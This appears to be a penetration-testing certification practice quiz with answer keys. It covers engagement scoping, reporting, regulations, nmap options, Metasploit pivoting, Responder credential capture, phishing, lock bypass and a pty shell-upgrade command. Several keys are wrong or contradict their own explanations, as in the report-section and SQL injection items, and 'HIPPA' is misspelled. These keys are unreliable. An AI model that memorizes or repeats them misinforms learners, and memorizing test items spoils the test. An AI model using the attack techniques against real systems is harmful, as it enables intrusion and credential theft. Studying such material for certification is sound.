- D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.
You are a penetration tester, and you have just completed testing for a new client. You are meeting with your client to discuss the penetration test. At the end of the meeting, you ask your client to sign an agreement stating that you have fulfilled your responsibilities according to your contract. What is this called?
A. Attestation of findings
B. Client acceptance
C. Follow-up actions/retest
D. Lessons learned
- B. You should obtain client acceptance upon the completion of your services. This may include a written acknowledgment of your final report. Most times, this includes a face-to-face meeting where you can discuss the results of the engagement with your client and answer any questions they might have. Client acceptance marks the end of the engagement and is the formal agreement that the tester has completed the scope of work.
A penetration tester has recently finished a test that revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and that management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while providing a low-effort and short-term solution? (Choose two.)
- Identify and remove the dynamic SQL from the stored procedures.
- Identify and remove the inline SQL statements from the code.
- Identify and sanitize all user inputs.
- Identify the source of malicious input and block the IP address.
- Use a blacklist validation for the SQL statements.
- Use a whitelist validation for the SQL statements.
- E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.
You and a colleague are discussing which law regulates how financial institutions handle their customers’ personal information. What is this law called?
A. Federal Information Processing Standard (FIPS) Publication 140-2 (FIPS PUB 140-2)
B. Gramm-Leach-Bliley Act of 1999 (GLBA)
C. Health Insurance Portability and Accountability Act of 1996 (HIPPA)
D. Sarbanes-Oxley Act of 2002 (SARBOX)
- B. The Gramm-Leach-Bliley Act (GLBA) is also known as the Financial Modernization Act of 1999. It is a U.S. federal law that requires financial institutions to explain how they share and protect their customers’ private information.
A penetration tester is using Metasploit. What command would allow the tester to access a private network from the Internet?
A. db_nmp -iL /tmp/privatentwk.txt
B. run autoroute -a 192.168.1.10/24
C. set rhost 192.168.1.10
D. use auxiliary/server/socks4a
- D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.
A penetration tester sends email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that she forgot her VPN password and now it is locked because she tried too many wrong ones. She asks the employee for his VPN username and password so she can log on and update the customer database with a huge new order. She mentions in the email that one of the target employee’s coworkers has done this for her in the past and it wasn’t a big deal. What motivation factors did the penetration tester use in this scenario? (Choose two.)
- Social proof
- Urgency
- Scarcity
- Authority
- Fear
- A and B. The penetration tester is using two motivation factors in this example. She is using urgency and social proof as motivating factors. Because it is a huge order, the employee probably feels a sense of urgency to comply. The penetration tester also employs social proof by mentioning the name of a familiar co-worker. This probably helps the employee feel more comfortable with giving the penetration tester his username and password.
You have just concluded a penetration test for a client. During the test, you discovered that one of the Linux system administrators uses Telnet to remotely access Linux servers. In your final report, what should you recommend the client do to remediate this issue?
A. Prohibit remote server access.
B. Use SFTP for remote server access.
C. Use rsh for remote server access.
D. Use SSH for remote server access.
- D. The Telnet protocol does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the Secure Shell (SSH) server and client for remote server access. SSH encrypts authentication information as well as data transfers between systems.
An organization’s network was recently hacked. The attackers first compromised the weak security used by one of the organization’s contractors. Then they used the contractor’s authentication credentials to gain access to the organization itself. Which type of penetration assessment could have prevented this?
A. Objective-based
B. Pre-merger
C. Goal-based
D. Supply chain
- D. In a supply chain assessment, a penetration test is conducted on an organization’s vendors to ensure their networks are secure and can’t be used as a pivot point to compromise the organization itself. A goal-based assessment is designed to test a specific aspect of an organization’s security. A premerger test is usually conducted on an organization prior to it merging with another.
During a gray box penetration test, the tester wants to poison queries for the target organization’s domain controller in order to redirect client requests to the tester’s laptop and capture usernames and hashed passwords. Which utility could be used to do this?
A. Searchsploit
B. Empire
C. Impacket
D. Responder
- D. The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.
Which of the following is not an open source intelligence (OSINT) gathering tool?
- FOCA
- Nessus
- nslookup
- whois
- B. Nessus is a commercial vulnerability scanning tool used to scan a wide variety of devices and is not part of the tools available for OSINT gathering. There are a variety of tools that assist with this OSINT collection:
- Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
- Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Microsoft Office documents, PDFs, and other common file formats.
- Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
- Nslookup tools help identify the IP addresses associated with an organization.
- Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
- Shodan is a specialized search engine to provide the discovery of vulnerable Internet of Things (IoT) devices from public sources.
- theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
- Whois tool gathers information from public records about domain ownership.
You and a colleague are discussing which law requires that healthcare-related organizations must be in compliance with certain security standards. What is this law called?
A. Federal Information Processing Standard (FIPS) Publication 140-2 (FIPS PUB 140-2)
B. Gramm-Leach-Bliley Act of 1999 (GLBA)
C. Health Insurance Portability and Accountability Act of 1996 (HIPPA)
D. Sarbanes-Oxley Act of 2002 (SARBOX)
- C. The Health Insurance Portability and Accountability Act of 1996 (HIPPA) is a U.S. legislation that requires data privacy and security provisions for safeguarding medical information. The law has emerged into greater importance recently with the explosion of health data breaches caused by cyberattacks and ransomware attacks on health insurers and providers.
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a “zero knowledge” test of their network. Which type of penetration test should you perform?
A. Black box
B. Grey box
C. White box
D. Compliance based
- A. A black box test is sometimes referred to as a zero knowledge assessment because the penetration testers have little or no knowledge of the client’s network. This type of assessment best emulates a real-world external attack.
You are performing a gray box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify a help desk employee and a payroll employee. You craft an email to the payroll employee that appears to come from the help desk employee directing the payroll employee to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use?
- Phishing
- Interrogation
- Spear phishing
- Whaling
- C. A spear phishing attack was used in this scenario because the malicious email was specifically crafted for a specific employee. A generic phishing attack, on the other hand, would have been sent indiscriminately to a large group of employees within the organization.
What is stored in the SAM database on a Windows system?
- Security log entries
- Digital signatures associated with each application installed on the system
- Group Policy settings
- Hashed account passwords
- D. The SAM database on a Windows system contains hashed passwords for local accounts. It is located in C:\Windows\System32\config\ by default. If a copy of this file can be made, it can be cracked using a number of different tools available on the Internet to expose the passwords it contains.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this?
- nmap 192.168.1.1 -sS
- nmap 192.168.1.1 -sT
- nmap 192.168.1.1 -sU
- nmap 192.168.1.1 -sA
- A. The –sS option causes the nmap utility to conduct a SYN port scan of the specified target system.
During a gray box penetration test, the tester acts as a man-in-the-middle between a web server and an end user’s workstation. When the user’s browser requests a page from the web server using TLS 1.2, the tester alters the request and specifies that SSL 2.0 be used instead to protect the session. What kind of exploit has occurred in this scenario?
- SSL stripping
- Downgrade
- NAC bypass
- Replay attack
- B. In this example, a downgrade man-in-the-middle attack has occurred because SSL 2.0 is less secure than TLS 1.2. Unless the user is exceptionally vigilant, they will likely not notice that SSL is being used to protect the session instead of TLS.
You are a penetration tester, and you are planning on conducting a black box penetration test for a new client. You have completed the reconnaissance phase of the test and are now ready to move on to the next phase of testing. However, before doing so, you contact the client and inform them that testing is moving forward. What type of communication trigger is being used?
A. Critical findings
B. Communication path
C. Situational awareness
D. Stages
- D. In this scenario, the tester has completed one phase of testing and is ready to move onto the next phase. This is called stages. During completion of a testing stage, the tester should contact the client and inform them of the completion of one stage and proceed to the next stage of testing.
Which of the following prevents unauthorized or unhealthy devices from connecting to a network, even if they connect to the wired or wireless network properly?
- Network Access Control (NAC)
- WPA2-PSK
- Virtual LANs (VLANs)
- Spanning Tree Protocol (STP)
- A. Network access control (NAC) systems require network hosts to meet security policy requirements before being allowed to access the network, even if they have properly been connected to a network jack or associated with an access point. Unauthorized or unhealthy devices are usually placed on an isolated remediation network until they are authorized or until they are brought into compliance. After doing so, they are allowed to connect to the actual network segment.
You are a penetration tester, and your client wants you to scan their system. They want you to go to great lengths to avoid detection. The client does not want their cybersecurity team to be aware that a penetration test is taking place. What type of scan will you be performing?
A. A compliance scan
B. A discovery scan
C. A full scan
D. A stealth scan
- D. During a penetration test, a tester may want to configure their scans to run as stealth scans. Stealth scans go to great lengths to avoid using tests that might attract attention. Service disruptions, error messages, and log entries caused by scans may attract attention from the cybersecurity team that causes them to adjust defenses in a manner that obstructs the penetration test. Using stealth scans better approximates the activity of a skilled attacker, resulting in a more realistic penetration test.
A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization’s facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a piece of strong tape over the door locking tab, allowing her to return into the room later without authorization. What is this technique called?
- Lock picking
- Lock bypass
- Fence jumping
- Badge cloning
- B. Lock bypass occurs when an attacker prevents a door’s locking mechanism from working. For example, this could be done by placing tape over the locking tab, as was done in this scenario.
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client’s end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?
A. Architectural diagrams
B. Sample requests
C. XSD
D. All of the above
- D. In a white box test, you should have access to extensive internal documentation. Because an in-house developed application will be used as the attack vector, you should require the client to provide as much documentation about that application as possible. For example, you should ask for architectural diagrams, sample application requests, and the swagger document, as applicable.
You are a penetration tester, and you are conducting a test for a new client. You run the following from an exploited machine:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
What action are you performing?
A. You are creating a sandbox.
B. You are capturing the credentials.
C. You are removing the Bash history.
D. You are upgrading the shell.
- D. The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.
You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this?
A. Technological
B. People
C. Process
D. Scalable
- A. Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an external penetration testing contractor. Which of the following are disadvantages of using an external team? (Choose two.)
A. There is a potential conflict of interest if they also perform testing for one of your competitors.
B. They lack the technical talent of an internal team.
C. They are usually more expensive than an internal team.
D. They may bring their personal biases into the test.
- A and C. Using an external team of contractors to perform penetration testing has several drawbacks that should be considered. First, there could be a potential for a conflict of interest if they also perform penetration testing for one of your competitors. Second, they tend to be quite expensive.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do? (Choose two.)
A. Remove any shell sessions created during the test.
B. Obscure everything you did during the test from the client.
C. Document everything you do during the cleanup.
D. Obscure everything you do to clean up after the test.
- A and C. After a penetration test, it is critical that you undo everything you have done. For example, if you set up any shell sessions, especially reverse shells, you need to make sure that they are removed. In addition, you should document everything you do as you clean up after the test. It’s always possible that you may inadvertently break something during the cleanup process. If this happens, having documentation of what you did will be invaluable.
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s wireless network using Aircrack-ng while sitting in your car in a parking lot across the street. To address this vulnerability, you recommend that the client implement directional wireless network antennas and also manipulate the power level of the access points to prevent signal emanation. What type of solution is this?
A. Technological
B. People
C. Process
D. Scalable
- A. Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of technological mitigation strategies.
You are a penetration tester, and you are conducting a test for a new client. During testing, you were able to compromise a single workstation. Upon doing so, you were able to maneuver laterally throughout the domain with very few roadblocks. Which migration strategies should you recommend in your report to the client? (Choose three.)
A. That they apply additional network access control
B. That for all logons, they require multifactor authentication
C. That for each machine, they randomize local administrator credentials
D. That for local administrators, they disable remote logons
E. That they increase the minimum password complexity requirements
F. That they put each host into its own virtual local area network (VLAN)
G. That on every workstation, they enable full-disk encryption
- B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be as follows:
- Use multifactor authentication: Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism.
- Increase minimum password complexity: Complex passwords use different types of characters in unique ways to increase security making it harder for an attacker to crack.
- Enable full-disk encryption: Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.
Which nmap option causes the utility to relay connections through a proxy server?
A. –proxies
B. -S
C. -D
D. -g
- A. The –proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.
A client has requested that a wireless penetration test be done. Which scoping target information will most likely be needed before testing can start?
- The bands and frequencies of the wireless devices used by the client
- The preferred wireless access point vendor of the client
- The number of wireless devices owned by the client
- The physical location and network ESSIDs to be tested
- A. In this scenario, the penetration tester would need to receive the bands and frequencies used by the client’s wireless devices to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, and knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.
One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following terms best describes this shared understanding?
A. Situational awareness
B. De-escalation
C. De-confliction
D. Goal reprioritization
- A. Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.
You are a penetration tester, and you are conducting a test for a new client. You are prioritizing the vulnerabilities discovered during the vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 3.6. What risk category does this vulnerability belong?
A. Low
B. Medium
C. High
D. Critical
- A. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0-6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 3.6 and falls within the Low category.
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization’s internal firewalls. The tester has been given a desk, a computer connected to the organization’s network, and a network diagram. The tester has also been given authentication credentials with a fairly high level of access. What type of test is being conducted in this scenario?
A. Gray box assessment
B. Black box assessment
C. Goals-based assessment
D. White box assessment
- D. A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. A gray box test may provide some information about the environment to the penetration testers without giving full access. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?
A. Burn the report to an optical disk and keep it in a hanging file folder in your desk.
B. Save the file to an encrypted flash drive and store it in a locket cabinet.
C. Copy the file to your phone.
D. Save the report to your organization’s FTP server.
- B. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, saving the file to an encrypted flash drive and storing it in a secured cabinet would make it more difficult for the report to be stolen than the other options listed.
You are a penetration tester, and you have just completed testing for a new client. You are creating a written report of your findings after the testing. In what section of the report should you provide the reader with an in-depth outline of the testing performed and the results found?
A. In the Executive Summary section
B. In the Findings and Remediation section
C. In the Methodology section
D. In the Metrics and Measures section
- A. The executive summary is the most important section of the report. Most times, it is the only section that many individuals will read, so it should be written in a manner that conveys all the important conclusions of the report in “layman’s terms,” in other words, in a clear manner that is understandable to everyone. The executive summary serves as a high-level view of both risk and business impact in plain English. Its purpose is to be concise and clear. It should be nontechnical so readers can review and gain insight into the security concerns that are highlighted in the report.
You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to sensitive financial data stored on an internal database server. What should the client do prior to starting the test?
A. Create internal user accounts for the testers that have the same level of privileges as a typical employee.
B. Whitelist the testers’ user accounts in their web application firewall (WAF).
C. Configure certificate pinning.
D. Configure security exceptions that allow the penetration testers’ systems to bypass network access controls (NAC).
E. None of the above.
- E. Because a black box test is being conducted in this scenario, the client’s network should be in “shields up” mode. The penetration testers should not have internal user accounts, nor should their systems be allowed to bypass NAC security controls. Certificate pinning should not be allowed.
You and a colleague are discussing an upcoming physical security assessment. The discussion turns to mantraps. Which of the following types of physical security attacks does a mantrap utilize?
A. Impersonation
B. Lock picking
C. Piggybacking
D. Shoulder surfing
- C. Piggybacking attacks rely on following employees in through secured doors or other entrances. A high-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.
You and a colleague are discussing multifactor authentication. Your colleague asks you for an example of what multifactor authentication is. What do you tell your colleague?
A. That multifactor authentication is using biometric fingerprints and voice recognition
B. That multifactor authentication is using smart cards and PINs
C. That multifactor authentication is using retina scans and voice recognition
D. That multifactor authentication is using usernames, PINs, and employee ID numbers
- B. In this scenario, the best option to tell your colleague is that multifactor authentication is using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.
Consider the following image:
Which nmap command could have been used to generate this output?
A. nmap 10.0.0.1-10
B. nmap 10.0.0.1-10 -sL
C. nmap 10.0.0.1-10 –sn
D. nmap 10.0.0.1-10 –PR
- C. In this example, the nmap utility was used to discover available targets. This is done by running nmap with the –sn option. This causes nmap to discover hosts, but not actually scan any of their ports.
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by adding random bits to the hashing operation?
A. Salting
B. Reversing the hash
C. Using OTP
D. Implementing multifactor authentication
- A. Salting the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).
While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax:
PrimeNumArray = [2, 3, 5, 7, 11]
Which type of script could this be? (Choose two.)
A. PowerShell
B. Bash
C. Ruby
D. Python
- C and D. When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, …].
You are performing a gray box penetration test and have just finished running your vulnerability scans, categorizing the results, and adjudicating the data. Now you need to prioritize the vulnerabilities prior to moving to the next phase of the test. Which of the following would likely constitute the highest priority vulnerabilities to exploit? (Choose two.)
- A domain controller is running on an older version of Window Server and is missing several critical security updates.
- A user’s desktop system is missing a Windows feature update.
- A user’s desktop system is running an earlier version of Ubuntu Linux.
- A database server is vulnerable to the WannaCry exploit.
- A and D. In this scenario, the value of compromising a vulnerable domain controller or a database server is much higher than the value of compromising an end user’s vulnerable workstation. For example, compromising a domain controller could expose multiple user accounts. Likewise, compromising a database server could expose valuable company information. On the other hand, the exposure created by a missing Windows feature update is probably minimal. Likewise, Linux provides a relatively high degree of system security, even on an older distribution.
Which of the following architectures is used to provide an XML-based description of HTTP-based web services running on a web application server and is commonly used with Representational State Transfer (REST) web applications?
A. Simple Object Access Protocol (SOAP)
B. Web Application Description Language (WADL)
C. Representational State Transfer (REST)
D. Swagger
- B. The Web Application Description Language (WADL) provides an XML-based description of HTTP-based web services running on a web application server. WADL is typically used with Representational State Transfer (REST) web services. WADL is an alternative to WSDL and is generally considered easier to use but also lacks the flexibility associated with WSDL.
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization’s e-commerce website. The tester, located in a different city, will utilize several different penetration testing tools to analyze the site and attack it. The tester does not have any information about the site or any authentication credentials. What type of test is being conducted in this scenario?
A. White box assessment
B. Black box assessment
C. Objective-based assessment
D. Gray box assessment
- B. In a black box test, testers are not provided with any access to or information about the target. A white box test is performed with full knowledge of the underlying network. A gray box test may provide some information about the environment to the penetration testers without giving full access. Objective-based assessments are usually designed to assess the overall security of an organization.
You have been asked to perform a black box penetration test for a medium-sized organization that sells imported motorcycles and ATVs online. In which phase of this assessment will you likely spend most of your time?
A. Planning and scoping
B. Information gathering and vulnerability identification
C. Attacking and exploiting
D. Reporting and communicating results
- B. A black box penetration test is called for in this scenario, so you will likely spend most of your time in the information gathering and vulnerability identification phase of the assessment. This is because, by definition, you should have little or no knowledge of the organization or its network prior to running the test.
You are a penetration tester, and you have just completed testing for a new client. Your report to the client lists a total of nine vulnerabilities, with four of those determined to be critical. The client does not have the budget to immediately correct all the vulnerabilities. What should you suggest is the best option for the client given these circumstances?
A. That they apply easy compensating controls for the critical vulnerabilities to minimize risk, and then reprioritize remediation
B. That they identify the vulnerabilities that can be remediated quickest and address them first
C. That they implement the least impactful of the critical vulnerability remediation first and then address other critical vulnerabilities
D. That they correct the most critical vulnerability first, even if it means fixing the other vulnerabilities may take longer to correct
- D. In this scenario, the client does not have the budget to immediately correct all the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.
Which of the following tools can be used to debug or decompile an Android executable? (Choose two.)
A. APK Studio
B. Olydbg
C. Immunity debugger
D. APKX
E. GDB
- A and D. Both APK Studio and APKX can be used to debug or even decompile an Android executable.
Which of the following protocols is the Representational State Transfer (REST) web application architecture based on?
A. FTP
B. HTTP
C. SMB
D. LDAP
- B. The Representational State Transfer (REST) web application architecture is based on the Hypertext Transfer Protocol (HTTP).
You are a penetration tester, and you have been hired by a new client to conduct a penetration test. The client would like you to test their proprietary design documents. The goal of the test is to bypass security measures and gain unauthorized access to these documents. What type of assessment will you be conducting?
A. A compliance-based assessment
B. A goal-based assessment
C. An objective-based assessment
D. A red team assessment
- D. Red team assessments are typically more targeted than normal penetration tests. The red team acts like an attacker, targeting sensitive data or systems with the goal of acquiring access. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization, and compliance-based assessments are designed to test compliance with specific laws.
A junior technician in an organization’s IT department runs a penetration test on a corporate web application. During testing the technician discovers that the application can disclose a SQL table that has all the corporate user account and password information. How should the junior technician notify upper management?
A. The technician should connect to the SQL server using this information and change the passwords of a few noncritical accounts to demonstrate a proof of concept to management.
B. The technician should document the findings using an executive summary including recommendations and screenshots to provide to management.
C. The technician should notify the development team of the discovery and suggest that input validation be enforced on the web application’s SQL query strings.
D. The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.
- D. In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.
Which command in a PowerShell script will cause it to write the value of a variable named TargetHost on the screen?
A. echo $TargetHost
B. print (TargetHost)
C. writeln TargetHost
D. puts TargetHost
- A. Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.